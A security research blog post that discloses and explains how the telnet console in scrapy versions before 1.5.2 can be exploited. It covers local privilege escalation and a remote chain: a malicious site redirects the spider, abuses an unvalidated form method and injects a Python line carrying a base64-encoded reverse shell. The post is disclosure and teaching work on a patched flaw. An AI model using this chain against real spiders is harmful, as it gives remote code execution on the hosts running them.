“Web scraping considered dangerous”: Exploiting the telnet service in scrapy < 1.5.2
Disclaimer: scrapy 1.5.2 has been released on January 22th, to avoid being exploited you must disable telnet console (enabled by default) or upgrade up to
This year the focus of our research will be security in web scraping frameworks. Why? Because it’s important for us. As a little context, between 2012 and 2017, I’ve worked at the world leader Scrapinghub programming more than 500 spiders. At alertot we use web spiders to get fresh vulnerabilities from several sources, then it’s a core component in our stack.
We use scrapy daily and most of the vulnerabilities will be related to it and its ecosystem in order to improve its security, but we also want to explore web scraping frameworks in other languages.
Ok, let’s go with the new material!
Just to clarify, the vulnerabilities exposed in this post affect
scrapy < 1.5.2 . As mentioned in the changelog of scrapy 1.6.0,
scrapy 1.5.2 introduced some security features in the telnet console, specifically authentication, which protects you from the vulnerabilities I’m going to reveal.
Debugging by default
Getting started with scrapy is easy. As you can see from the homepage, you can run your first spider in seconds and the log shows information about enabled extensions, middlewares and other options. What always has called my attention is a telnet service enabled by default.
[scrapy.middleware] INFO: Enabled extensions:
[scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
It’s the telnet console running on port
6023, which purpose is to make debugging easier. Usually telnet services are restricted to a set of functions but this console provides a python shell in the context of the spider, which makes it powerful for debugging and interesting if someone gets access to it.
To be sincere, it’s not common to turn to the telnet console. I’ve used it to debug spiders either running out of memory (in restricted environments) or taking forever, totalling around 5 out of 500+ spiders.
My concern was that console was available without any authentication, then any local user could connect to the port and execute commands in the context of the user running the spider. The first proof of concept is to try to exploit this local privilege escalation (LPE) bug.
An easy LPE
To demonstrate this exploitation, there are two requirements:
- The exploiter has access to the system.
- There’s a spider running and exposing the telnet service. The following spider meets this requirement, making an initial request and then idling because of the
Our exploit is simple:
It defines a reverse shell, connects to the telnet service and sends a line to execute the reverse shell using Python’s
os.system . I’ve created the next video to show this in action!
Now, we’re going to begin our journey to pass from this local exploitation to a remote exploitation!
Taking control of spider’s requests
Below there’s a spider created by the command
scrapy genspider example example.org .
It contains some class attributes and one of them is
allowed_domains . According to the documentation, it is defined as:
An optional list of strings containing domains that this spider is allowed to crawl. Requests for URLs not belonging to the domain names specified in this list (or their subdomains) won’t be followed if
Then, if the spider tries to make a request to
example.edu , it will be filtered and displayed on the log:
[scrapy.spidermiddlewares.offsite] DEBUG: Filtered offsite request to ‘example.edu’: <GET http://example.edu>
However, an interesting behavior happens when there’s a request to a page in an allowed domain but redirects to a not allowed domain, since it won’t be filtered and will be processed by the spider.
That’s an unintended behavior but under security scrutiny it’s something. Imagine that there’s a
dangerous.tld website and you want to create a spider that logs in to the user area. The server side logic would be like this:
login.html used on route
/ displays a form with
action=/login . A sample spider for the website would be:
An overview of the steps are:
- The spider sends a
http://dangerous.tld/at line 8.
- At line 11, it sends a
FormRequest.from_responsethat detects automatically the form in the web page and sets the form values based on
- At line 18 the spider prints that the authentication was successful.
Let’s run the spider:
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (200) <POST http://dangerous.tld/login> (referer: http://dangerous.tld/)
[scrapy.core.engine] INFO: Closing spider (finished)
Everything is fine, the spider is working and logs in successfully. What about the website becoming a malicious actor?
allowed_domains behavior, the malicious actor could manage that the spider sends requests to domains of its interest. To demonstrate this, we will review the spider steps. The first step of our spider creates a
GET request to
/ and the original code for the home endpoint is:
However, the website (now malicious) changes the logic to:
Running again the spider gives us the following output:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://example.org> from <GET http://dangerous.tld/>
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://example.org> (referer: None)
[scrapy.core.scraper] ERROR: Spider error processing <GET http://example.org> (referer: None)
Despite the error, indeed the spider has requested
http://example.org with a
GET request. Moreover, it’s also possible to redirect the
POST request (with its body) created in step 2 using a redirect with code 307.
Actually, it’s some class of SSRF that I’d name “Spider Side Request Forgery” (everyone wants to create new terms 😃). It’s important to note some details about the environment:
- Usually a spider is only scraping one website, then it’s not common that a spider is authenticated on another website/domain.
- The spider requests the URL and likely there’s no way to get back the response (it’s different from common SSRF).
- Until now, we can control only the full URL and maybe some part of the body in a
In spite of all these constraints, this kind of vulnerability, as well as SSRF, opens a new scope: the local network and localhost. Certainly we don’t know about services in the local network, so the key question is: what’s surely running on localhost, unauthenticated and provides code execution capabilities? The telnet service!
Let’s speak telnet language
Now, we’re going to redirect the requests to
Running the spider against this malicious actor gives us a lot of errors:
[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://localhost:6023> from <GET http://dangerous.tld/>
[scrapy.downloadermiddlewares.retry] DEBUG: Retrying <GET http://localhost:6023> (failed 1 times): [<twisted.python.failure.Failu
re twisted.web._newclient.ParseError: (‘non-integer status code’, b’\xff\xfd”\xff\xfd\x1f\xff\xfd\x03\xff\xfb\x01\x1bc>>> \x1b[4hGET / HTTP/1.1\r\r’)
Traceback (most recent call last):
Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly.
It seems that the number of errors is equal to the number of lines of our
GET request (including headers), then we are reaching the telnet port but not sending a valid Python line. We need more control of sent data since
GET instruction and headers don’t meet Python syntax. What about the body part of the
POST request sending the login credentials?
Let’s come back to the original version of
home route and try to exploit the login form logic.
Posting to telnet
The idea of using a
POST request is to handle the request’s body, as near the start as possible to build a valid Python line. The argument
formdata passed to
FormRequest.from_response will update the form values, adding these new values at the end of the request’s body. That’s great, the malicious actor could add a hidden input to the form and it would be at the start of request’s body.
The request’s body sent by the spider starts with
malicious=1 , however
FormRequest.from_response encodes with URL-encoding every input then it’s not possible to build a valid Python line.
Is it possible to send a
POSTrequest without an encoded body? Yes, using the normal Request class with
method=POSTand set body. It’s the way to send
POSTrequests with a
JSONbody but I don’t consider that a real scenario where the malicious actor could have control of the body of that request.
Something more to try? I know that the method should be a list of valid values (
GET, POST, etc ) but let’s try if scrapy is compliant with that. We’re going to modify the form method to
gaga and see the output of the spider:
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (405) <GAGA http://dangerous.tld/login?username=user&password=secret> (referer: http://danger
It doesn’t validate that the method of the form is valid, good news! If I create a HTTP server supporting
GAGA method, I could send a redirect to
localhost:6023/payload and this new request with
GAGA method will reach the telnet service. There’s hope for us!
Creating the Python line
The idea is to create a valid line and then try to comment the remainder of the line. Taking into account how a
HTTP request is built and the idea of a custom HTTP server, the line sent to the telnet console eventually will be:
GAGA /payload HTTP/1.1
As seen in previous output, scrapy has uppercased my method
GAGA , then I can’t inject immediately Python code because it will be invalid. As the method will be always first, the only option I saw was to use a method like
GET =' to create a valid string variable and then in the URI put the closing apostrophe and start my Python code.
GET =' /';mypayload; HTTP/1.1
payload is Python code and can be separated by semicolons. The idea of commenting the remainder of the line after
payload is not possible since scrapy deletes the character
# . The remainder is
HTTP/1.1 , then if I declare
HTTP as a float, it would be a valid division and won’t raise any exception. The final line would look like this:
GET =' /';payload;HTTP=2.0; HTTP/1.1
Glueing everything together
payload section is special:
- It can’t contain any space.
- The scope is limited i.e. the variable
GETdoesn’t exist in
- Some characters like
Taking in consideration these limitations, we’re going to build our
payload as this:
At line 1 we define our reverse shell, at line 2 we encode it in
base64 encoding and we use the magic function
__import__ to import the modules
base64 that eventually allow to execute our reverse shell as a command.
Now, we have to create a webserver capable of handling this special
GET =' method. Since popular frameworks don’t allow that (at least with ease), as well as in the XXE exploitation, I had to hack the class BaseHTTPRequestHandler from
http module to serve the valid
GET and the invalid
GET =' requests. The custom web server is below:
The important pieces are:
- Line 11 serves
malicious_login.htmltemplate when the server receives the
GETrequest to the endpoint
/. What is different in this
malicious_login.htmlfile? Our special method!
- At line 33 it’s the start of the method
handle_one_requestfrom the parent class. It’s almost the same, except that at line 52 we detect that the form was sent (seeing that there’s an
usernamestring in the URI).
- At line 18, we define our malicious logic. First, we set a 307 redirect code, that way it keeps our weird method and it’s not changed. Then, we build our payload and send a
Locationheader to the spider, that way it will hit the telnet service.
Let’s see this in action!
After this unexpected exploitation, I’m going to create some issues on Github to address the issues related to unfiltered redirections and invalid form methods.
I really liked the decision took on
scrapy 1.5.2 since they added authentication to the telnet service with user/password and if the password is not set, they create a random and secure one. It’s not optional security, it’s security by design.
I hope you enjoyed this post and stay tuned for the following part of this research!